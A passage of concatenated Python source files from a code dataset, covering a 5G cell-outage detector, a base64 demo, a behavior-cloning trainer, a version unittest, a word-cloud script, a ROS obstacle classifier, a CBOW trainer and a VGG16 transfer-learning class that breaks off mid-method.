REGRESSORS\n#######################################\n\n#######################################\n# RUN ML ALGORITHMS\n#######################################\n\ndef calculate_z_scores(predictions, x_test):\n \"\"\" Calculates z-scores based on predictions from regressor,\n also needs to have data containing user locations\"\"\"\n dataset_basestations = pd.read_csv(\"basestations.csv\") # TODO: make it read from DB\n\n # Calculate number users that are closest to cell:\n list_ues_per_bs = [0] * 7\n for i in range(0, len(predictions)):\n if predictions[i] >= 0.1:\n min_distance = sys.float_info.max\n base_station_id = -1\n for j, bs in dataset_basestations.iterrows():\n distance = math.sqrt(((bs[\"LocationX\"] - x_test[i][2]) ** 2) + ((bs[\"LocationY\"] - x_test[i][3]) ** 2))\n if distance < min_distance:\n min_distance = distance\n base_station_id = j\n list_ues_per_bs[base_station_id] += 1\n\n # Define Z-scores\n z1score = list()\n for i in range(0, 7):\n mean = (sum(list_ues_per_bs) - list_ues_per_bs[i]) / 6.0\n variance = 0.0\n for j in range(0, 7):\n if not j == i:\n variance += ((list_ues_per_bs[j] - mean) ** 2) / 6.0\n variance = 1.0 if variance == 0.0 else variance # Change variance to 1.0 if 0.0\n z1score.append(abs(list_ues_per_bs[i] - mean) / math.sqrt(variance))\n\n return z1score\n\n\ndef get_cell_ids():\n cell_ids = list()\n for i in range(0, 7):\n cell_ids.append(\"Cell \" + str(i+1)) #FIXME !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n return cell_ids\n\n\ndef calculate_reference_z_scores(array_x, array_y):\n \"\"\" Calculates reference z-score for each regressor \"\"\"\n global regressors\n global z_scores_ref\n x_train, x_test, y_train, y_test = train_test_split(array_x, array_y, test_size=0.2, random_state=7)\n predictions = regressors[Regressor.SIMPLE_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.SIMPLE_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.SIMPLE_REG.value][\"BS\"] = get_cell_ids()\n predictions = regressors[Regressor.DECISION_TREE_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.DECISION_TREE_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.DECISION_TREE_REG.value][\"BS\"] = get_cell_ids()\n predictions = regressors[Regressor.RANDOM_FOREST_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.RANDOM_FOREST_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.RANDOM_FOREST_REG.value][\"BS\"] = get_cell_ids()\n predictions = regressors[Regressor.SVR_REG.value].predict(np.asarray(x_test)[:, 4:])\n z_scores_ref[Regressor.SVR_REG.value][\"Ref. Z-scores\"] = calculate_z_scores(predictions, x_test)\n z_scores_ref[Regressor.SVR_REG.value][\"BS\"] = get_cell_ids()\n return z_scores_ref\n\n\ndef run_ml(array_x):\n \"\"\" Run machine learning once. Returns ID of broken cell.\n Based on comparing reference and new z-scores \"\"\"\n global sel_reg_enum\n predictions = regressors[sel_reg_enum.value].predict(np.asarray(array_x)[:, 4:])\n z_score_ref = get_ref_z_scores(sel_reg_enum)\n z_scores_new = dict()\n z_scores_new['BS'] = get_cell_ids()\n z_scores_new['Ref. Z-scores'] = get_ref_z_scores(sel_reg_enum)['Ref. Z-scores']\n z_scores_new['Z Score'] = calculate_z_scores(predictions, array_x)\n\n high4 = [0, -1]\n for i in range(0, 7):\n if high4[1] < z_scores_new[\"Z Score\"][i]:\n high4[1] = z_scores_new[\"Z Score\"][i]\n high4[0] = i + 1\n #high4[2] = z_scores_new[i]\n score_outage = []\n for i in range(0, 7):\n # if i == 3 and z_scores_new[i] == high4[1]:\n # score_outage.append(i)\n if z_scores_new[\"Z Score\"][i] >= z_score_ref['Ref. Z-scores'][i]:\n score_outage.append(i)\n maxval = [0, -1]\n\n for i in range(0, len(score_outage)):\n if maxval[1] < z_scores_new[\"Z Score\"][score_outage[i]]:\n maxval[1] = z_scores_new[\"Z Score\"][score_outage[i]]\n maxval[0] = score_outage[i] + 1\n #maxval[2] = z_scores_new[score_outage[i]]\n\n if maxval[1] >= 0.3:\n return [maxval[0], z_scores_new]\n else:\n return [0, z_scores_new]\n\n # OLD CODE\n # for i in range(0, 7):\n # if z_scores_new[i] >= z_scores_ref[i] and z_scores_new[i] > highest_z_score:\n # outage_id = i +1\n # highest_z_score = z_scores_new[i]\n\n#######################################\n# END: RUN ML ALGORITHMS\n#######################################\n\n\ndef get_number_of_cells():\n \"\"\" Returns number of cells in simulation \"\"\"\n dict_dfs = dict()\n if 0 < read_mongo_guaranteed(dictionary=dict_dfs, collection=\"simulation_configurations\"):\n return dict_dfs[\"simulation_configurations\"][\"nMacroEnbSites\"].iloc[-1] * 3\n\n\ndef update_nb_cell_lists():\n \"\"\"\" Updates neighbouring cell lists in DB. \"\"\"\n dict_dfs = dict()\n if 0 > read_mongo_guaranteed(dictionary=dict_dfs, collection=\"handover_log\"):\n return\n df_nb_cells = dict()\n read_mongo_guaranteed(dictionary=df_nb_cells, collection=\"nb_cell_list\")\n\n df_nb_pairs = dict_dfs[\"handover_log\"][[\"CellID\", \"TargetCellID\"]].loc[dict_dfs[\"handover_log\"][\"TargetCellID\"] != 0]\n cell_count = get_number_of_cells()\n\n for i in range(1, cell_count+1):\n new_nb_cells = (df_nb_pairs.loc[(df_nb_pairs[\"CellID\"] == i) | (df_nb_pairs[\"TargetCellID\"] == i)].sum(axis=1) - i).drop_duplicates().tolist()\n if len(df_nb_cells['nb_cell_list']) != 0:\n nb_cells = df_nb_cells['nb_cell_list'].loc[df_nb_cells['nb_cell_list'][\"CellID\"] == i][\"NbCellIDs\"]\n if len(nb_cells) != 0:\n new_nb_cells.extend(x for x in nb_cells.iloc[0] if x not in new_nb_cells)\n collection_update_with_set(collection=\"nb_cell_list\", query={\"CellID\": i}, value={\"NbCellIDs\": new_nb_cells})\n\n\n##############################################################\n# END: MACHINE LEARNING\n##############################################################\n","sub_path":"fiveG/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"278286327","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport base64\nimport fire\n\nclass base64_test(object):\n def base(self,data):\n print((\"data:{}\").format(data))\n# base 64でencode\n enc_data = base64.encodestring(data.encode(\"utf8\")).decode(\"ascii\")\n# そんなデータを出力\n print((\"encode data:{}\").format(enc_data))\n# decodeするよ\n dec_data = base64.decodestring(enc_data.encode(\"ascii\")).decode(\"utf8\")\n# そんなデータを出力\n print ((\"decode data:{}\").format(dec_data))\n\n\nif __name__ == '__main__':\n fire.Fire(base64_test)\n","sub_path":"blog/python_module_fire_example/import_base64.py","file_name":"import_base64.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"130788988","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.optim as optim\nimport pickle\n\n\nclass MotionData(Dataset):\n\n def __init__(self, filename):\n self.data = pickle.load(open(filename, \"rb\"))\n print(\"The dataset contains this many datapoints: \", len(self.data))\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n item = self.data[idx]\n return torch.FloatTensor(item)\n\n\nclass MLP(nn.Module):\n\n def __init__(self):\n super(MLP, self).__init__()\n\n self.fc_1 = nn.Linear(8, 16)\n self.fc_2 = nn.Linear(16, 4)\n self.loss = nn.CrossEntropyLoss()\n\n def forward(self, x):\n h1 = torch.tanh(self.fc_1(x))\n return self.fc_2(h1)\n\n\ndef main():\n\n model = MLP()\n\n EPOCH = 1000\n BATCH_SIZE_RATIO = 10.0\n LR = 0.01\n LR_STEP_SIZE = 400\n LR_GAMMA = 0.1\n\n dataname = \"expert_dataset.pkl\"\n savename = \"expert_bc.pt\"\n\n train_data = MotionData(dataname)\n BATCH_SIZE_TRAIN = int(len(train_data) / BATCH_SIZE_RATIO)\n train_set = DataLoader(dataset=train_data, batch_size=BATCH_SIZE_TRAIN, shuffle=True)\n\n optimizer = optim.Adam(model.parameters(), lr=LR)\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=LR_STEP_SIZE, gamma=LR_GAMMA)\n\n for epoch in range(EPOCH):\n for batch, x in enumerate(train_set):\n optimizer.zero_grad()\n s = x[:,0:8]\n a = x[:,8].long()\n ahat = model(s)\n loss = model.loss(ahat, a)\n loss.backward()\n optimizer.step()\n scheduler.step()\n print(epoch, loss.item())\n torch.save(model.state_dict(), savename)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"behavior_cloning/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"284301591","text":"\n'''\nunit testing of punx._version module\n'''\n\n#-----------------------------------------------------------------------------\n# :author: Pete R. Jemian\n# :email: prjemian@gmail.com\n# :copyright: (c) 2014-2017, Pete R. Jemian\n#\n# Distributed under the terms of the Creative Commons Attribution 4.0 International Public License.\n#\n# The full license is in the file LICENSE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\nimport os\nimport sys\nimport unittest\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', 'src'))\nimport spec2nexus as pkg\nimport spec2nexus._version as _version\nfrom spec2nexus._version import git_release\n\n\nclass TestGitRelease(unittest.TestCase):\n\n# def test_simple(self):\n# self.assertEqual(_version.DEVELOPER_TEST_STRING, \n# '__developer_testing__', \n# 'static string exists')\n\n# def test_git_release_package_exception(self):\n# self.assertRaises(ValueError, git_release, 'not_the_package_name')\n\n def test_git_release_undefined(self):\n self.assertNotEqual('release_undefined', \n git_release(pkg.__package_name__),\n 'give the correct package name')\n\n def test_mismatch_version_string(self):\n version_string = 'mismatch_version_string'\n r = git_release(pkg.__package_name__, version_string)\n self.assertFalse(r.startswith(version_string), version_string)\n\n def test_version(self):\n path = os.path.dirname(_version.__file__)\n version_str = open(os.path.join(path, 'VERSION'), 'r').read().strip()\n\n release = git_release(pkg.__package_name__)\n self.assertTrue(release.startswith(version_str), \n 'found release: ' + release)\n\n release = git_release(pkg.__package_name__, version=version_str)\n self.assertTrue(release.startswith(version_str), \n 'found release: ' + release)\n\n version_str = 'not_a_known_version'\n release = git_release(pkg.__package_name__, version=version_str)\n self.assertFalse(release.startswith(version_str), \n 'found release: ' + release)\n\n def test_versioneer_fail(self):\n release = git_release(pkg.__package_name__, pkg.__version__)\n self.assertTrue(release.find('0+unknown') < 0, \n 'versioneer cannot find current version info')\n \n\ndef suite(*args, **kw):\n test_suite = unittest.TestSuite()\n test_suite.addTest(unittest.makeSuite(TestGitRelease))\n return test_suite\n\n\nif __name__ == '__main__':\n runner=unittest.TextTestRunner()\n runner.run(suite())\n","sub_path":"tests/_version_test.py","file_name":"_version_test.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325823175","text":"import csv\nimport os\nimport re\nfrom wordcloud import WordCloud\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nfrom wordcloud import WordCloud, ImageColorGenerator\n\ndef get_filenames(path):\n file_names = []\n for x in os.listdir(path):\n # print(x)\n y = os.path.join(path,x)\n if os.path.isfile(y):\n file_path = os.path.split(y)\n lists = file_path[1].split('.') #分割出文件与文件扩展名 \n file_ext = lists[-1] #取出后缀名(列表切片操作)\n img_ext = ['csv']\n if file_ext in img_ext:\n file_name = ' '.join(lists[:-1])\n file_names.append(file_name)\n return file_names\n\ndef main():\n path = 'ChannelStatistics'\n file_names = get_filenames(path)\n\n for name in file_names:\n if name[0] == '#':\n continue\n\n tag_dict = {}\n with open('ChannelStatistics/' + '#tag_statistics_' + name + '.csv', 'w', encoding='utf-8-sig', newline='') as csvfile:\n fieldnames = ['tags', 'viewCount']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n with open(path+ '/' + name + '.csv', 'r', encoding='utf-8-sig',newline='') as csvfile:\n csv_reader = csv.DictReader(csvfile)\n for row in csv_reader:\n viewCount = int(row['viewCount'])\n try:\n tags = eval(row['tags'])\n except:\n tags = list(row['tags'])\n \n for tag in tags:\n if tag in tag_dict:\n tag_dict[tag] += viewCount\n else:\n tag_dict[tag] = viewCount\n pass\n \n for tag, viewCount in tag_dict.items():\n writer.writerow({fieldnames[0]:tag, fieldnames[1]:viewCount})\n \n pass\n\ndef showFancySentiment(file_name):\n tag_dict = {}\n\n with open('ChannelStatistics/' + file_name + '.csv','r', encoding='utf-8-sig',newline='') as csvfile:\n fieldnames = ['tags', 'viewCount']\n csv_reader = csv.DictReader(csvfile)\n for row in csv_reader:\n viewCount = int(row['viewCount'])\n tag = row['tags']\n tag_dict[tag] = viewCount\n pass\n color_mask = imread(\"china_map.png\")\n\n wc = WordCloud(\n #设置字体,不指定就会出现乱码,注意字体路径\n font_path=\"simkai.ttf\",\n #font_path=path.join(d,'simsun.ttc'),\n #设置背景色\n background_color='white',\n #词云形状\n mask=color_mask,\n #允许最大词汇\n max_words=2000,\n #最大号字体\n max_font_size=60,\n scale=32\n )\n wc.generate_from_frequencies(Counter(tag_dict))\n image_colors = ImageColorGenerator(color_mask)\n wc.recolor(color_func=image_colors)\n wc.to_file(\"wcloud_\" + file_name+ \".jpg\")\n\n # plt.imshow(wc,interpolation=\"bilinear\") # 显示词云\n # plt.axis('off') # ��闭坐标轴\n # plt.show()\n \ndef batchWordCloud(path):\n path = 'ChannelStatistics'\n file_names = get_filenames(path)\n\n for name in file_names:\n if name[0] != '#':\n continue\n \n showFancySentiment(name)\n \n\n\nif __name__ == '__main__':\n # showFancySentiment('#tag_statistics_CCTV中国中央电视台')\n batchWordCloud('ChannelStatistics')\n # main()\n","sub_path":"tag_statistics.py","file_name":"tag_statistics.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195752327","text":"import json\n\ndef source(filePath):\n target = None\n with open(filePath) as file:\n target = json.load(file)\n if target is None\\\n or 'templates' not in target:\n raise ValueError('Config file not exist or missing templates key')\n async def iterator():\n startPage: int = int(target.get('start', 1))\n templates = target['templates']\n if isinstance(templates, str): templates = [templates]\n while True:\n for template in templates:\n yield template.format(startPage)\n startPage += 1\n return iterator","sub_path":"URLGenerator.py","file_name":"URLGenerator.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20570112","text":"#!/usr/bin/env python\n#import libraries\nimport rospy\nfrom PIL import Image\nimport cv2 \nimport numpy as np \nfrom matplotlib import pyplot as pp\nimport math\nfrom nav_msgs.msg import Odometry\nfrom threading import Timer\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot\nimport threading\nfrom math import cos, sin, pi\nfrom sensor_msgs.msg import LaserScan \nfrom geometry_msgs.msg import Twist \nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import String\nfrom std_msgs.msg import String,Int32,Int32MultiArray,MultiArrayLayout,MultiArrayDimension\nfrom turtlebot3_master.msg import ScanData\n\npositionx = None\npositiony = None\nzq = 0\nwq= 0\nxq = 0\nyq = 0\nalreadyClicked = 0\nstart = False\nJ11 = 0\nJ22 = 0\nclosestObstacle = 0\ncurrentPosition = 0\nclosestObtacleAngle = 0\narrayOfObstacles = list(range(0, 360))\nassumedx = list(range(0, 360))\nassumedy = list(range(0, 360))\n\ndef callback1(dt): \n\n \n global closestObstacle\n global closestObtacleAngle\n global arrayOfObstacles\n global assumedx\n global assumedy\n global start\n global alreadyClicked \n closestObstacle = min(dt.ranges)\n \t#Looking for the smallest distance \n closestObtacleAngle = dt.ranges.index(min(dt.ranges))\n t0 = +2.0 * (wq * xq + yq * zq)\n t1 = +1.0 - 2.0 * (xq * xq + yq* yq)\n roll_x = math.atan2(t0, t1)\n #Transformation from Quaternion to Euler angles \n t2 = +2.0 * (wq * yq - zq * xq)\n t2 = +1.0 if t2 > +1.0 else t2\n t2 = -1.0 if t2 < -1.0 else t2\n pitch_y = math.asin(t2)\n \n t3 = +2.0 * (wq * zq + xq * yq)\n t4 = +1.0 - 2.0 * (yq * yq + zq * zq)\n yaw_z = math.atan2(t3, t4)\n changedToAngles = (180 * yaw_z)/(math.pi) \n x = (407/2) + -(1) * ((407 - 0) / (10 - (-10)))\n\n for distance in range(len(dt.ranges)):\n \t#We iterate through every element from the ranges array and transform values to find the assumed x and y position for all of the obstacles\n \tarrayOfObstacles[distance] = dt.ranges[distance]\n \t#Calculating the angle under which the obstacles lies , taking in consideration both - rotation and scanner angle \t\n \tangle = (math.radians(360 - distance - changedToAngles)) \t\n \tradius = dt.ranges[distance] * 20\n \t#calculating the assumed x and y for the obstacles \t\n \tx = J11 + (radius * cos(angle))\n \ty = J22 + (radius * sin(angle)) \t\n \tassumedx[distance] = x\n \tassumedy[distance] = y\n #Cleaning the arrays \t\n if(len(arrayOfObstacles) > 360):\n \tarrayOfObstacles = []\n \tassumedx =[]\n \tassumedy =[]\n\ndef callback(msg):\t\n\tglobal positionx\n\tglobal positiony\n\tglobal zq\n\tglobal wq\n\tglobal xq\n\tglobal yq\n\tpositionx = msg.pose.pose.position.x\n\tpositiony = msg.pose.pose.position.y\n\tglobal J11\n\tglobal J22\n\t#Calculating the current position of the robot\n\tJ11 = (407/2) + -(positionx) * ((407 - 0) / (10 - (-10)))\n\tJ11 = 407 - J11 \n\tJ22 = (407/2) + -(positiony) * ((407 - 0 )/ (10 - (-10)))\n\t#Getting the current orientation of the robot \n\tzq = msg.pose.pose.orientation.z\n\twq = msg.pose.pose.orientation.w\n\tyq = msg.pose.pose.orientation.y\n\txq = msg.pose.pose.orientation.x\t\n\treturn J11 , J22 \n\ndef cutCirle():\n\t#Opening the map\n\tmatrix = cv2.imread(\"/home/harumanager/catkin_ws/src/maps/supermap1.pgm\", cv2.IMREAD_COLOR)\n\t#Cutting the picture\n\tmatrix = matrix[200:607, 0:407]\n\t#Displaying the robot cooridnates\n\tnewCoorinatex = int(J22)\n\tnewCoorinatey = int(J11)\n\tmatrix[newCoorinatex,newCoorinatey] = [254 , 50 ,50]\n\t#Applying the mask\n\tmask = sector_mask(matrix.shape,(J22,J11,),71.225,(0,360))\n\tmatrix[~mask] = 125\n\tn = np.array(matrix)\n\t#Getting the number of white and black pixels\n\tnumber_of_white_pix = np.sum(matrix== 254)\n\tnumber_of_black_pix = np.sum(matrix == [0,0,0])\n\tobstacleType = None\t\n\tdisntance_array = []\n\tangle_array = []\n\t#Assigning the coordinates of the black pixels to the array\n\tif(number_of_black_pix > 0):\t\t\n\t\tycoords, xcoords = np.where((n[:, :, 0:3] == [0,0,0]).all(2))\t\t\n\t\tsizeArray = len(xcoords)\t\t\n\t\tobstacleTypeArray = []\n\t\t#Iterating through all 360 values from scanner reading \t\n\t\tfor values in range(360):\n\t\t\tobstacleType = None\t\t\t\n\t\t\tfor xy in range(len(xcoords)):\n\t\t\t\t#If value is infinitive - there are no obstacles\n\t\t\t\tif(math.isinf(arrayOfObstacles[values]) == True):\n\t\t\t\t\tobstacleType = 2\n\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\t\t\t\t\tbreak\t\n\n\t\t\t\t#Checking if the assumed value lies within 3% error margin as the black pixel values from the cutted piece of map\n\t\t\t\tif (assumedx[values] - (assumedx[values] * 0.03) <= xcoords[xy] <= assumedx[values] + (assumedx[values] * 0.03)):\n\t\t\t\t\tindexxy = xy\n\t\t\t\t\t#Checking the same condition for y coorrdinate\t\t\n\t\t\t\t\tif (assumedy[values] - (assumedy[values] * 0.03)<= ycoords[indexxy] <= assumedy[values] + (assumedy[values] * 0.03)):\n\t\t\t\t\t\t#Obstacle exists both on the map and simulation \n\t\t\t\t\t\tobstacleType = 1\n\t\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\t#Obstacle doesnt exist on the map\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(xy == len(xcoords)-1):\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tobstacleType = 0 \n\t\t\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t\t\t\t \n\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tif(xy == len(xcoords)-1):\t\t\t\t\t\n\t\t\t\t\t\tobstacleType = 0 \n\t\t\t\t\t\tobstacleTypeArray.append(obstacleType)\n\t\t\t\t\t\t\n\n\t\t\t\t\t\n\t#There are no obstacles on the map\t\n\telse:\n\t\tif (math.isinf(closestObstacle) == True ):\t\t\t\n\t\t\tobstacleType = 2\n\n\t\telif (math.isinf(closestObstacle) == False):\t\t\t\n\t\t\tobstacleType = 0 \n\n\n\tAnglesObstacles = list(range(1, 360))\t\n\trate = rospy.Rate(10)\t\n\t#Publishing the message\n\tscanDataMsg = ScanData()\n\tscanDataMsg.angles = AnglesObstacles\n\tscanDataMsg.ranges = arrayOfObstacles\n\tscanDataMsg.type = obstacleTypeArray\t\n\tpub.publish(scanDataMsg)\t\n\tTimer(0.01, cutCirle).start()\n\ndef point_on_circle(): \n \n #center of circle, angle in degree and radius of circle\n center = [J22, J11]\n angle = (math.radians(closestObtacleAngle - 90))\n radius = closestObstacle * 20.35\n x = J11 + (radius * cos(angle))\n y = J22 + (radius * sin(angle))\n \n\n return x,y\n\ndef sector_mask(shape,centre,radius,angle_range):\n \n\t#Cutting the piece of map - which resambles the scanner range \n x,y = np.ogrid[:shape[0],:shape[1]]\n cx,cy = centre\n tmin,tmax = np.deg2rad(angle_range) \n if tmax < tmin:\n tmax += 2*np.pi \n r2 = (x-cx)*(x-cx) + (y-cy)*(y-cy)\n theta = np.arctan2(x-cx,y-cy) - tmin \n theta %= (2*np.pi) \n circmask = r2 <= radius*radius \n anglemask = theta <= (tmax-tmin)\n return circmask*anglemask\n\ndef talker():\n pub = rospy.Publisher('chatter', String, queue_size=10)\n rospy.init_node('talker', anonymous=True)\n rate = rospy.Rate(10) # 10hz\n while not rospy.is_shutdown():\n hello_str = \"hello world %s\" % rospy.get_time()\n rospy.loginfo(hello_str)\n pub.publish(hello_str)\n rate.sleep()\n\nif __name__ == '__main__':\n\t#start = False\n\trospy.init_node('ObstacleType')\n\tpub = rospy.Publisher(\"scan_eval\", ScanData, queue_size=10)\n\todom_sub = rospy.Subscriber('/odom', Odometry, callback)\n\tsub = rospy.Subscriber(\"/scan\", LaserScan, callback1)\t\t\n\tstartingx = 280\n\tstartingy = 290\t\n\tcutCirle()\t\n\tpoint_on_circle()\t\n\trospy.spin()\n\t\n","sub_path":"ROB10-main/obstacle-avoidance-turtlebot/src/masters_avodiance.py","file_name":"masters_avodiance.py","file_ext":"py","file_size_in_byte":7156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"280708287","text":"import numpy as np\nimport pickle\n\nfrom datasets import ptb\nfrom src.models import CBOW\nfrom src.optimizers import Adam\nfrom src.trainer import Trainer\nfrom src.utils import create_contexts_target, most_sililar, analogy\n\n\ndef train():\n window_size = 5\n hidden_size = 100\n batch_size = 100\n max_epoch = 10\n\n corpus, word_to_id, id_to_word = ptb.load_data('train')\n vocab_size = len(word_to_id)\n\n contexts, target = create_contexts_target(corpus, window_size)\n model = CBOW(vocab_size, hidden_size, window_size, corpus)\n optimizer = Adam()\n trainer = Trainer(model, optimizer)\n\n trainer.fit(contexts, target, max_epoch, batch_size, None)\n trainer.plot()\n\n word_vecs = model.word_vecs\n\n params = {}\n params['word_vecs'] = word_vecs.astype(np.float16)\n params['word_to_id'] = word_to_id\n params['id_to_word'] = id_to_word\n pkl_file = 'cbow_params.pkl'\n\n with open(pkl_file, 'wb') as f:\n pickle.dump(params, f, -1)\n\n\ndef evaluate():\n pkl_file = 'cbow_params.pkl'\n with open(pkl_file, 'rb') as f:\n params = pickle.load(f)\n\n word_vecs = params['word_vecs']\n word_to_id = params['word_to_id']\n id_to_word = params['id_to_word']\n\n queries = ['you', 'year', 'car', 'toyota']\n for query in queries:\n most_sililar(query, word_to_id, id_to_word, word_vecs)\n\n opt = {\n 'word_to_id': word_to_id,\n 'id_to_word': id_to_word,\n 'word_matrix': word_vecs\n }\n\n print('-'*50)\n analogy('king', 'man', 'queen', **opt)\n analogy('take', 'took', 'go', **opt)\n analogy('car', 'cars', 'child', **opt)\n analogy('good', 'better', 'bad', **opt)\n\n\nif __name__ == '__main__':\n train()\n evaluate()\n","sub_path":"ch_04.py","file_name":"ch_04.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168236146","text":"from tensorflow.keras.applications.vgg16 import VGG16\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Flatten, Dense\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom configs.config import CFG\nfrom model.base_model import BaseModel\nimport os\nfrom model import lr_scheduler\n\n\nclass VGGSPA(BaseModel):\n def __init__(self, config):\n super().__init__(config)\n self.base_model = VGG16(include_top=False, input_shape=self.config.model.input)\n self.batch_size = self.config.train.batch_size\n self.model = None\n self.opt = None\n self.epochs = self.config.train.epochs\n self.steps_per_epoch = 0\n\n self.image_size = self.config.train.image_size\n self.training_generator = None\n self.validation_generator = None\n self.test_generator = None\n\n def train_generator(self):\n \"\"\"Instantiate the generator object that feeds the train images to the train cycle\"\"\"\n # Data augmentation\n training_data_generator = ImageDataGenerator(\n rescale=self.config.train.preprocess.rescale,\n shear_range=self.config.train.preprocess.shear_range,\n zoom_range=self.config.train.preprocess.zoom_range,\n horizontal_flip=self.config.train.preprocess.horizontal_flip)\n\n self.training_generator = training_data_generator.flow_from_directory(\n self.config.data.path.train_path,\n target_size=(self.config.train.image_size, self.config.train.image_size),\n batch_size=self.batch_size,\n classes=os.listdir(self.config.data.path.train_path))\n\n def valid_generator(self):\n \"\"\"Instantiates the generator object to feed the validation images to the train cycle\"\"\"\n validation_data_generator = ImageDataGenerator(rescale=self.config.train.preprocess.rescale)\n\n self.validation_generator = validation_data_generator.flow_from_directory(\n self.config.data.path.valid_path,\n target_size=(self.config.train.image_size, self.config.train.image_size),\n batch_size=self.batch_size,\n classes=os.listdir(self.config.data.path.train_path))\n\n def t_generator(self):\n \"\"\"Instantiates the generator object that feeds the test images to the evaluate method\"\"\"\n test_data_generator = ImageDataGenerator(rescale=self.config.train.preprocess.rescale)\n\n self.test_generator = test_data_generator.flow_from_directory(self.config.data.path.test_path,\n target_size=(self.config.train.image_size,\n self.config.train.image_size),\n batch_size=1, class_mode=None, shuffle=True)\n\n def build(self):\n for layer in self.base_model.layers:\n layer.trainable = False\n\n # add new classifier layers\n flatten1 = Flatten()(self.base_model.layers[-1].output)\n class1 = Dense(self.config.model.dense1.units, activation=self.config.model.dense1.activation,\n kernel_initializer=self.config.model.dense1.kernel_initializer)(flatten1)\n output = Dense(self.config.model.output.units, activation=self.config.model.output.activation)(class1)\n # define new model\n self.model = Model(inputs=self.base_model.inputs, outputs=output)\n\n def train(self, args):\n self.opt = SGD(lr=self.config.train.optimizer.lr, momentum=self.config.train.optimizer.momentum)\n self.model.compile(loss=self.config.train.loss, metrics=self.config.train.metrics, optimizer=self.opt)\n modelCheckpoint = ModelCheckpoint(os.path.join(args.ckpt_path, self.config.model.output.model_filename),\n monitor='val_accuracy',\n verbose=1, save_best_only=True, mode='max', period=10)\n if args.lrs == 'stepdecay':\n schedule = lr_scheduler.StepDecay(initAlpha=0.001, factor=0.25, dropEvery=10)\n model_history = self.model.fit_generator(self.training_generator, steps_per_epoch=len(\n self.training_generator.filenames) // self.batch_size,\n epochs=self.epochs, validation_data=self.validation_generator,\n validation_steps=len(\n self.validation_generator.filenames) // self.batch_size,\n callbacks=[modelCheckpoint, LearningRateScheduler(schedule)],\n verbose=self.config.train.verbose)\n if args.plot:\n schedule.plot(self.epochs)\n elif args.lrs == 'linear':\n linear_schedule = lr_scheduler.PolinomialDecay(maxEpochs=self.epochs, initAlpha=0.001, power=1)\n model_history = self.model.fit_generator(self.training_generator, steps_per_epoch=len(\n self.training_generator.filenames) // self.batch_size,\n epochs=self.epochs, validation_data=self.validation_generator,\n validation_steps=len(\n self.validation_generator.filenames) // self.batch_size,\n callbacks=[modelCheckpoint, LearningRateScheduler(linear_schedule)],\n verbose=self.config.train.verbose)\n if args.plot:\n linear_schedule.plot(self.epochs)\n\n elif args.lrs == 'polinomial':\n polinomial_schedule = lr_scheduler.PolinomialDecay(maxEpochs=self.epochs, initAlpha=0.001, power=5)\n\n model_history = self.model.fit_generator(self.training_generator, steps_per_epoch=len(\n self.training_generator.filenames) // self.batch_size,\n epochs=self.epochs, validation_data=self.validation_generator,\n validation_steps=len(\n self.validation_generator.filenames) // self.batch_size,\n callbacks=[modelCheckpoint,\n LearningRateScheduler(polinomial_schedule)],\n verbose=self.config.train.verbose)\n if args.plot:\n polinomial_schedule.plot(self.epochs)\n\n return model_history.history['loss'], model_history.history['val_loss']\n\n def evaluate(self):\n 